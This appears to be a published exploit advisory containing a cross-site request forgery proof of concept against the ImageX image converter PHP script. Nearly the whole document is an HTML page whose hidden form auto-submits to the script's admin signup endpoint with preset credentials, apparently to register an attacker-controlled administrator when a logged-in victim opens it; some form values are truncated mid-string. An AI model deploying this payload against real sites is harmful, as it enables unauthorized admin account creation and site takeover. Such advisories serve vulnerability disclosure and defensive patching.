Date: 05-03-2025
Exploit Author: Bu?ra Enis D?nmez
Vendor Homepage: https://www.codester.com/items/48649/imagex-image-converter-120-formats-php-script
Version: latest
Tested on: Arch Linux
##################################### CSRF PoC #####################################
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h1>CSRF PoC</h1>
<form id="csrfForm" action="https://localhost/mega-img-converter/actions/regadminsignupauth.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="
<input type="hidden" name="lastname" value="neci" />
<input type="hidden" name="email" value="
<input type="hidden" name="password" value="kenan5" />
<input type="hidden" name="confirmpassword" value="kenan5" />
<input type="hidden" name="isajax" value="someValue" />
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
##################################### CSRF PoC Ended #####################################